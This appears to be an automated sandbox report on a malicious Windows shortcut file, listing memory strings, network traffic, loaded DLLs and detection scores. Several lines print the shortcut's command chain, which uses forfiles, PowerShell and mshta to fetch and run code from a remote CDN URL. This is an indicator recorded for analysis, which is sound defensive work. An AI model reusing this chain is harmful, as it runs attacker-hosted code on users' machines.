Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-500-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-700-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-700-normal.woff2)
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff)
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff2)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-400-normal.woff)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-400-normal.woff2)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff2)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-700-normal.woff)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-700-normal.woff2)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-900-normal.woff)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-900-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-300-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-300-normal.woff2)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-400-normal.woff)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-400-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff2)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-700-normal.woff)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-700-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff2)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff2)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-400-normal.woff)
Source: css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-400-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-500-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7826000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-500-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-700-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-700-normal.woff2)
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-900-normal.woff)
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.drString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-900-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latinD
Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000006.00000003.1498181186.000001BD6B320000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5540000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7898000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp, 8t6beMY1wO.lnkString found in binary or memory: https://vidstreemz.b-cdn.net/nexto
Source: powershell.exeString found in binary or memory: https://vidstreemz.b-cdn.net/nexto$global:?
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nexto(
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nexto...
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nexto.n
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nexto5m
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nexto;
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nextoC:
Source: mshta.exe, 00000004.00000002.2699345662.00000271E5740000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nextoFPS_BROWSER_AP
Source: forfiles.exe, 00000000.00000002.1463995255.00000204B96F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nextoFi?
Source: mshta.exe, 00000004.00000002.2699008025.00000271E5690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nextoH
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nextoM
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nextoY
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nextoc
Source: mshta.exe, 00000004.00000002.2697931791.0000008398745000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nextoi
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nextonAsV
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nextop
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nextot-logo.svg0
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vidstreemz.b-cdn.net/nextoubik:300
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 138.199.36.7:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 169.150.247.37:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 169.150.247.39:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 169.150.236.104:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 169.150.247.36:443 -> 192.168.2.8:49709 version: TLS 1.2

System Summary

barindex
Source: 8t6beMY1wO.lnkLNK file: /p C:\Windows /m win.ini /c "powershell . mshta https://vidstreemz.b-cdn.net/nexto"
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal84.winLNK@7/12@5/6
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\css[1].htmJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mo1p1wfj.apt.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\forfiles.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 8t6beMY1wO.lnkVirustotal: Detection: 33%
Source: 8t6beMY1wO.lnkReversingLabs: Detection: 45%
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows /m win.ini /c "powershell . mshta https://vidstreemz.b-cdn.net/nexto"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . mshta https://vidstreemz.b-cdn.net/nexto
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://vidstreemz.b-cdn.net/nexto
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . mshta https://vidstreemz.b-cdn.net/nextoJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://vidstreemz.b-cdn.net/nextoJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: 8t6beMY1wO.lnkLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
